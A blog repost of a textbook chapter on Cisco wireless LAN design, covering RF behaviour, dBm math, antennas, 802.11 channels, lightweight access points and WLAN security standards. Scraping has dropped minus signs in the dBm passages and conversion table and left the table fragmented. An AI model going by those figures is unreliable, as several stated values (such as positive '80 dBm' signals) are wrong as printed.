| 0 comments ]

The goal of this chapter is to introduce the Cisco Unified Wireless Network (UWN) architecture and to discuss wireless design principles. The chapter starts with an introduction to wireless technologies. Then the Cisco UWN is described. The chapter concludes with an exploration of considerations for designing Cisco UWNs in enterprise environments.

Add a note here Introduction to Wireless Technology

Add a note hereThis section includes some material form the Cisco Press title Building Cisco Multilayer Switched Networks (BCMSN) (Authorized Self-Study Guide), 4th Edition, ISBN 1-58705-273-3, as an introduction to wireless technology.

Add a note hereA wireless communication system uses radio frequency (RF) energy to transmit data from one point to another, through the air; the term signal is used to refer to this RF energy. The data to be transmitted is first modulated onto a carrier and then sent; receivers demodulate the signal and process the data.

Add a note hereThere are many different types of wireless network technologies, each providing a defined coverage area. Figure 9-1 illustrates the following wireless technologies, along with a description of how the coverage areas are used:

  • Add a note here Personal-area network (PAN): A PAN typically covers a person’s personal workspace.

  • Add a note here Local-area network: Wireless LANs (WLAN) are designed to be enterprise-based networks that allow the use of complete suites of enterprise applications, without wires.

  • Add a note here Metropolitan-area network (MAN): Wireless MANs are deployed inside a metropolitan area, allowing wireless connectivity throughout an urban area.

  • Add a note here Wide-area network: Wireless WANs are typically slower but offer more coverage, such as across rural areas.

Click to collapse
Add a note hereFigure 9-1: Wireless Technologies

Add a note hereWLANs replace the Layer 1 transmission medium of a traditional wired network (usually Category 5 cable) with radio transmission over the air. WLANs can plug into a wired network and function as an overlay to wired LANs, or they can be deployed as a standalone LAN where wired networking is not feasible. A computer with a wireless network interface card (NIC) connects to the wired LAN through an access point (AP). Properly deployed WLANs can provide instant access to the network from anywhere in a facility so that users can roam without losing their network connection.

Add a note here WLANs use spread-spectrum RF signals on the three unlicensed bands: 900 MHz, 2.4 GHz, and 5 GHz. The 900 MHz and 2.4 GHz bands are referred to as the industrial, scientific, and medical bands, and the 5 GHz band is commonly referred to as the Unlicensed National Information Infrastructure (UNII) band.

Add a note here RF Theory

Add a note hereRadio frequencies are high-frequency AC signals radiated into the air via an antenna, creating radio waves. Radio waves propagate away from the antenna in a straight line in all directions at once, just as light from a light bulb does. And, just as more light bulbs spread around a room provide better overall lighting, more antennas spread around a room provide stronger RF signals for mobile clients.

Phenomena Affecting RF

Add a note hereWhen radio waves hit a wall, door, or any other obstruction, the signal is attenuated, or weakened, which might result in reduced throughput. The following natural phenomena affect RF signals, as illustrated in Figure 9-2:

  • Add a note here Reflection: Occurs when the RF signal bounces off objects such as metal or glass surfaces.

  • Add a note here Refraction: Occurs when the RF signal passes through objects such as glass surfaces and changes direction.

  • Add a note here Absorption: Occurs when an object, such as a wall or furniture, absorbs the RF signal.

  • Add a note here Scattering: Occurs when an RF wave strikes an uneven surface and reflects in many directions. Scattering also occurs when an RF wave travels through a medium that consists of objects that are much smaller than the signal’s wavelength, such as heavy dust.

  • Add a note here Diffraction: Occurs when an RF wave strikes sharp edges, such as external corners of buildings, which bend the signal.

  • Add a note here Multipath: Occurs when an RF signal has more than one path between the sender and receiver. The multiple signals at the receiver might result in a distorted, low-quality signal.

Image from book
Add a note hereFigure 9-2: RF Phenomena

Add a note here Consider all these phenomena when designing, implementing, and troubleshooting WLANs.

RF Math

Add a note hereWLANs transmit signals just as radio stations do to reach their listeners. The transmit power levels for WLANs are in milliwatts (mW), whereas for radio stations the power levels are in megawatts (MW).

Add a note hereThe following are some units of measure used in RF calculations:

  • Add a note here Decibel (dB): The difference or ratio between two signal levels. dBs are used to measure relative gains or losses in an RF system and to describe the effect of system devices on signal strength. The dB is named after Alexander Graham Bell.

  • Add a note here dB milliwatt (dBm): A signal strength or power level. Zero dBm is defined as 1 mW of power into a terminating load such as an antenna or power meter. Small signals, those below 1 mW, are therefore negative numbers (such as 80 dBm); WLAN signals are in the range of 60 dBm to 80 dBm.

  • Add a note here dB watt (dBw): A signal strength or power level. Zero dBw is defined as 1 watt (W) of power; 1 W is one ampere (A) of current at 1 volt (V).

  • Add a note here dB isotropic (dBi): The gain a given antenna has over a theoretical isotropic (point source) antenna. Unfortunately, an isotropic antenna cannot be made in the real world, but it is useful for calculating theoretical system operating margins.

Add a note hereThe formula used for calculating losses, gains, and power for WLANs is too complex for most people to solve without a calculator. Gains or losses in decibels are summed and then converted into an absolute power in milliwatts or watts.

Add a note hereThe following formula calculates the transmit power:

Add a note hereTransmit Power (dBm) = 10 * log10[Transmit Power (mW)]

Add a note here Table 9-1 indicates how various gains and losses relate to power levels; it is useful for WLAN calculations.

Add a note here Table 9-1: dBm-to-milliwatt Conversion Table
Open table as spreadsheet

Add a note heredBm

Add a note heremW

Add a note heredBm

Add a note heremW

Add a note here 3

Add a note here.5

Add a note here10

Add a note here10

Add a note here0

Add a note here1

Add a note here20

Add a note here100

Add a note here3

Add a note here2

Add a note here30

Add a note here1,000 or 1 watt

Add a note here6

Add a note here4

Add a note here40

Add a note here10,000 or 10 watts

Add a note here9

Add a note here8

Add a note here50

Add a note here100,000 or 100 watts

Add a note here12

Add a note here16

Add a note here100

Add a note here1,000,000 or 1000 watts

Add a note hereNotice in Table 9-1 that RF math is easier when the following key points are considered:

  • Add a note hereEvery gain of 3 dBm means that the power is doubled. A loss of 3 dBm means that the power is cut in half.

  • Add a note hereA gain of 10 dBm means that the power increases by a factor of 10. A loss of 10 dBm means that the power decreases by a factor of 10.

Add a note hereTo calculate the power increase or decrease for a given dBm, factor the given number into a sum of 3dBm and 10dBm, and then convert using these rules. For example, a 9 dBm loss is equivalent to 3dBm + 3dBm + 3dBm. The following illustrates how to calculate the power level that a 200 mW signal decreases to when it experiences a 9 dBm loss.

  • Add a note here 200 mW 3dBm = 100 mW

  • Add a note here100 mW 3dBm = 50 mW

  • Add a note here50 mW 3dBm = 25 mW

Add a note hereTherefore, the 200 mW signal decreases to 25 mW with a 9dBm loss.

Antennas

Add a note hereAntennas used in WLANs come in many shapes and sizes, depending on the differing RF characteristics desired. The physical dimensions of an antenna directly relate to the frequency at which the antenna transmits or receives radio waves. As the gain increases, the coverage area becomes more focused. High-gain antennas provide longer coverage areas than low-gain antennas at the same input power level. As frequency increases, the wavelength and the antennas become smaller. Antennas can be categorized into one of the three following types:

  • Add a note here Omnidirectional: These antennas are the most widely used today but are not always the best solution. The radiant energy is shaped like a doughnut; consequently, the transmit signal is weak or absent directly under the AP (in the “hole” of the doughnut).

  • Add a note here Semidirectional: These antennas offer the capability to direct and apply gain to the signal. The radiant energy is in a cowbell shape.

  • Add a note here Highly directional: These antennas are intended for highly directed signals that must travel a long distance. The radiant energy is in a telescope shape.

Add a note here Agencies and Standards Groups

Add a note hereSome of the agencies and standards groups related to WLANs are as follows:

  • Add a note here Institute of Electrical and Electronic Engineers (http://www.ieee.org/): Creates and maintains operational standards.

  • Add a note here European Telecommunications Standards Institute (http://www.etsi.org/): Chartered to produce common standards in Europe.

  • Add a note here Wi-Fi Alliance (http://www.wi-fi.com/): Promotes and tests for WLAN interoperability.

  • Add a note here WLAN Association (http://www.wlana.org/): Educates and raises consumer awareness about WLANs.

  • Add a note here FCC (http://www.fcc.gov/): Regulates United States interstate and international communications by radio, television, wire, satellite, and cable.

  • Add a note here Canadian Radio-Television and Telecommunications Commission (http://www.crtc.gc.ca/): Regulates Canada’s broadcasting and telecommunications systems.

Add a note here IEEE 802.11 Operational Standards

Add a note hereIn September 1999 the IEEE ratified the IEEE 802.11a standard (5 GHz at 54 Mbps) and the IEEE 802.11b standard (2.4 GHz at 11 Mbps). In June 2003, the IEEE ratified the 802.11g standard (2.4 GHz at 54 Mbps); this standard is backward-compatible with 802.11b systems, because both use the same 2.4-GHz bandwidth. The following are the existing IEEE 802.11 standards for wireless communication:

  • Add a note here 802.11a: 54 Mbps at 5 GHz, ratified in 1999

  • Add a note here 802.11b: 11 Mbps 2.4 GHz, ratified in 1999

  • Add a note here 802.11d: World mode, ratified in 2001

  • Add a note here 802.11e: Quality of service, ratified in 2005

  • Add a note here 802.11F: Inter-Access Point Protocol, withdrawn in 2006

  • Add a note here 802.11g: 54 Mbps at 2.4 GHz, higher data rate than 802.11b, ratified in 2003

  • Add a note here 802.11h: Dynamic frequency selection and transmit power control mechanisms, ratified in 2003

  • Add a note here 802.11i: Authentication and security, ratified in 2005

  • Add a note here 802.11j: Additional Japanese frequencies, ratified in 2005

  • Add a note here 802.11k: Radio resource management draft, planned to be ratified in 2007

  • Add a note here 802.11n: High-throughput draft, planned to be ratified in 2007

IEEE 802.11b/g Standards in the 2.4 GHz Band

Add a note here The 2.4 GHz band used for 802.11b/g has multiple channels, each 22 MHz wide. In North America, 11 channels are defined, as illustrated in Figure 9-3. The top of the figure shows the channel’s center frequency (which is the frequency by which the channel is known); the lower numbers show the channel’s starting frequency. In North America, the 2.4 GHz band has three nonoverlapping channels: channels 1, 6, and 11.

Image from book
Add a note hereFigure 9-3: 2.4 GHz Channels in North America

Add a note hereCareful channel placement eliminates overlapping cells on the same channel so that aggregate WLAN throughput is maximized. This concept is similar to the placement of FM radio stations throughout the country; two radio stations in the same geographic area are never on the same channel.

Add a note hereTherefore, three APs, using the three nonoverlapping channels, could operate in the same area without sharing the medum. For example, an AP on channel 1 does not have any frequencies in common with an AP on channel 6 or with an AP on channel 11. Therefore, there is no degradation in throughput when three APs are in the same area if they are each on a nonoverlapping channel. Figure 9-4 illustrates how 802.11b/g cells can be placed so that no adjacent channels overlap.

Image from book
Add a note hereFigure 9-4: 2.4 GHz Channel Placement

Add a note here Different countries allow different channels and transmit power levels.


Note

Add a note here802.11g is backward-compatible with 802.11b. The 802.11g specification uses orthogonal frequency division multiplexing (OFDM) modulation for 802.11g data rates and complementary code keying modulation for 802.11b data rates.

Add a note hereMultipath interference is more of an issue with 802.11b. Some Cisco APs reduce multipath interference by providing multiple antennas; this feature is called antenna diversity. The device selects the antenna from which the best signal is received. For example, a typical Linksys wireless router has two “rubber duck” antennas. However, only one antenna is used at a time—the one that experiences the least multipath distortion of the signal.

Add a note hereThe 802.11g data rates are 54, 48, 36, 24, 18, 12, 9, and 6 Mbps. The 802.11b data rates are 11, 5.5, 2, and 1 Mbps. Figure 9-5 compares the 2.4 GHz common data rates and ranges for 802.11b/g.

Image from book
Add a note hereFigure 9-5: 2.4 GHz 802.11b/g Common Data Rate and Range Comparison

Note

Add a note here Higher data rates require more complex modulation than lower data rates. A greater signal-to-noise ratio is required to receive a signal with more complex modulation. Therefore, higher data rates can be received only at shorter distances, because signal strength decreases with distance while the noise floor (level) stays constant. At greater distances, the signal-to-noise ratio is lower than it is at shorter distances.

802.11a Standard in the 5-GHz Band

Add a note hereThe 5 GHz UNII band can be divided into multiple channels, depending on the regulations that vary by country. The U.S. now has three separate 100 MHz–wide bands known as the lower, middle, and upper bands. Within each of these three bands are four nonoverlapping channels. In the U.S., the FCC specifies that the lower band is for indoor use, the middle band is for indoor and outdoor use, and the upper band is for outdoor use. Figure 9-6 illustrates the nonoverlapping 802.11a channels.

Image from book
Add a note hereFigure 9-6: 5 GHz 802.11a Nonoverlapping Channels

Add a note here802.11a uses the same OFDM modulation and supports the same data rates as 802.11g. Figure 9-7 shows the 802.11a common data rates and ranges.

Image from book
Add a note hereFigure 9-7: 5 GHz 802.11a Common Data Rates and Ranges

Add a note here802.11a channel placement is easier to deploy than 802.11b/g, because 802.11a has 12 nonoverlapping channels that can provide a simpler channel reuse schema. However, the nonoverlapping channels for 802.11a (as shown in Figure 9-6) are close enough to each other that some clients might experience interference from adjacent channels (called side-band or side-channel interference). As a result, the recommendation for 802.11a is that neighboring cells not be placed on neighboring channels (in other words, neighboring channels are skipped) to reduce interference. Figure 9-8 illustrates 802.11a channel placement.

Image from book
Add a note hereFigure 9-8: 5 GHz Channel Placement

Add a note hereNote that the 802.11a coverage area is smaller than the 802.11b/g coverage area, requiring more APs on a per-area basis.

802.11 WLANs Versus 802.3 Ethernet LANs

Add a note hereBoth 802.11 WLANs and 802.3 Ethernet wired LANs define the physical and data link layers, use MAC addresses, and support the same upper-layer protocols. Both 802.11 WLANs and 802.3 Ethernet LANs use the Carrier Sense Multiple Access protocol to control access to the media. Ethernet uses a collision-detection algorithm, whereas 802.11 WLANs use a collision-avoidance algorithm.

Add a note here All the computers on the WLAN share the bandwidth. It is for this reason that collision detection is not possible on WLANs. A sending station cannot receive at the same time it is transmitting and therefore cannot detect whether another station is transmitting at the same time. Instead, devices avoid collisions by using request-to-send and clear-to-send messages.

Add a note here WLAN Topologies

Add a note hereCisco wireless products support the following three topologies:

  • Add a note here Wireless client access: For mobile user connectivity

  • Add a note here Wireless bridging: To interconnect LANs that are physically separated—for example, in different buildings

  • Add a note here Wireless mesh networking: To provide both client access and a dynamic, redundant connection between buildings

Add a note here WLAN Components

Add a note hereClient devices use wireless NICs or adapters to connect to a wireless network in either ad hoc (peer-to-peer) mode or infrastructure mode using APs. Cisco APs can be either autonomous or lightweight.


Note

Add a note hereAutonomous APs used to be called thick, fat, or decentralized APs, whereas lightweight APs were called thin or centralized APs.

Add a note hereThese components are described in the following sections.

Cisco-Compatible WLAN Clients

Add a note hereThe Cisco Compatible Extensions (CCX) program for WLAN client devices allows vendors of WLAN client devices or adapters to ensure interoperability with the Cisco WLAN infrastructure and take advantage of Cisco innovations. Wireless client products are submitted to an independent lab for rigorous testing; passing this testing process allows the devices to be marketed as Cisco Compatible client devices. There are four versions of the Cisco Compatible specification, versions 1 through 4. Each version builds on its predecessors; with a few exceptions, every feature that must be supported in one version must also be supported in each subsequent version.

Autonomous APs

Add a note hereCiscoWorks WLSE is a turnkey and scalable management platform for managing hundreds to thousands of Cisco Aironet autonomous APs and wireless bridges. Autonomous APs may also be configured with CiscoWorks WLSE Express, a complete WLAN management solution with an integrated authentication, authorization, and accounting (AAA) server for small to medium-sized enterprise facilities or branch offices using Cisco Aironet autonomous APs and wireless bridges.

Lightweight APs

Add a note hereThe WLCs and lightweight APs communicate over any Layer 2 (Ethernet) or Layer 3 (IP) infrastructure using the Lightweight AP Protocol (LWAPP) to support automation of numerous WLAN configuration and management functions. WLCs are responsible for centralized systemwide WLAN management functions, such as security policies, intrusion prevention, RF management, quality of service (QoS), and mobility.

Add a note hereA Cisco wireless location appliance may be added to track the location of wireless devices.

AP Power

Add a note hereOne issue for WLANs is that power might not be available where APs need to be located. Two solutions to this issue are Power over Ethernet (PoE) and power injectors. PoE, or inline power, provides operating current to a device, such as an AP, from an Ethernet port, over the Category 5 cable.


Note

Add a note here The IEEE 802.3af standard defines PoE. In addition, some Cisco devices support a prestandard proprietary method of powering devices over Ethernet. An optional power classification feature allows switches to recognize powered devices and identify their power requirements.

Add a note hereA midspan power injector is a standalone unit that adds PoE capability to existing networking equipment. The power injector is inserted into the LAN between the Ethernet switch and the device requiring power, such as an AP.

Add a note here WLAN Operation

Add a note hereIf a single cell does not provide enough coverage, any number of cells can be added to extend the range to an extended service area (ESA). It is recommended that the ESA cells have 10 to 15 percent overlap to allow remote users to roam without losing RF connections. If VoIP is implemented in the wireless network, it is recommended that the ESA cells have a 15 to 20 percent overlap. As discussed earlier, bordering cells should be set to different nonoverlapping channels for best performance.

Add a note hereAn SSID on an AP and on an associated client must match exactly. APs broadcast their SSIDs in a beacon, announcing their available services; clients associate with a specific SSID or learn the available SSIDs from the beacon and choose one with which to associate.

Add a note hereAPs can be configured not to broadcast a particular SSID, but the SSID is still sent in the header of all the packets sent and thus is discoverable by wireless survey tools. Therefore, configuring the AP not to broadcast an SSID is not considered a strong security mechanism by itself. This feature should be combined with some of the stronger mechanisms discussed in the next section.

Add a note here APs can have up to 16 SSIDs; VLANs are extended to the wireless network by mapping VLANs to SSIDs.

Add a note here WLAN Security

Add a note hereWLAN security includes the following:

  • Add a note here Authentication: Ensures that only legitimate clients access the network via trusted APs.

  • Add a note here Encryption: Ensures the confidentiality of transmitted data.

  • Add a note here Intrusion detection and intrusion protection: Monitors, detects, and mitigates unauthorized access and attacks against the network.

Add a note hereInitially, basic 802.11 WLAN security was provided via Wired Equivalent Privacy (WEP) authentication and encryption, using static keys. With static WEP, the encryption keys must match on both the client and the access point. Unfortunately, the keys are relatively easy to compromise, so static WEP is no longer considered secure.

Add a note hereWhile the 802.11 committee was developing a more robust standard security solution, vendors incorporated the IEEE 802.1X Extensible Authentication Protocol (EAP) to authenticate users via a RADIUS authentication server such as Cisco Secure Access Control Server (ACS) and to enforce security policies for them. Basing the authentication transaction on users, rather than on machine credentials, reduces the risk of security compromise from lost or stolen equipment. 802.1X authentication also permits flexible credentials to be used for client authentication, including passwords, one-time tokens, public key infrastructure (PKI) certificates, and device IDs.

Add a note hereWhen 802.1X is used for wireless client authentication, dynamic encryption keys can be distributed to each user, each time that user authenticates on the network. The Wi-Fi Alliance also introduced Wi-Fi Protected Access (WPA) to enhance encryption and protect against all known WEP key vulnerabilities. WPA includes the Temporal Key Integrity Protocol (TKIP) to provide per-packet keying that protects the WEP key from exploits that seek to derive the key using packet comparison, and a message integrity check (MIC) to protect against packet replay. MIC protects the wireless system from inductive attacks that seek to induce the system to send either key data or a predictable response that can be compared to known data to derive the WEP key.

Add a note hereIn late 2001, Cisco implemented a prestandard version of TKIP and MIC now called Cisco Key Integrity Protocol and Cisco Message Integrity Check, respectively. Cisco devices also now support the standard TKIP and MIC.

Add a note hereThe IEEE 802.11i standard now encompasses a number of security improvements, including those implemented in WPA. 802.1X authentication is still used; however, 802.11i specifies the use of the Advanced Encryption Standard (AES). AES is a stronger security algorithm than WEP, but it is more CPU-intensive and therefore requires updated hardware to run AES encryption while maintaining comparable throughput. The Wi-Fi Alliance–interoperable implementation of 802.11i with AES is called WPA2.


Note

Add a note hereWPA and WPA2 can also use a preshared key (PSK) instead of 802.1X when a RADIUS server is not available—for example, for home users. A PSK is similar to a password. Before communication starts, the same password is put on both devices (it is preshared) and the devices authenticate each other using the key.

Add a note here Table 9-2 summarizes the WLAN security evolution.

Add a note here Table 9-2: Evolution of WLAN Security
Open table as spreadsheet

Add a note hereInitial

Add a note hereWEP: No strong authentication, static keys, first-generation encryption, not scalable

Add a note hereInterim

Add a note here802.1X and WPA: Strong, user-based authentication, dynamic keys, improved encryption

Add a note herePresent

Add a note hereWireless intrusion detection system (IDS): Identify and protect against attacks

Add a note here802.1X, 802.11i/WPA2: Strong, user-based authentication, dynamic key management, AES encryption

Add a note hereFuture

Add a note hereImprovements to hashing algorithms and key management in conjunction with AES



0 comments

Post a Comment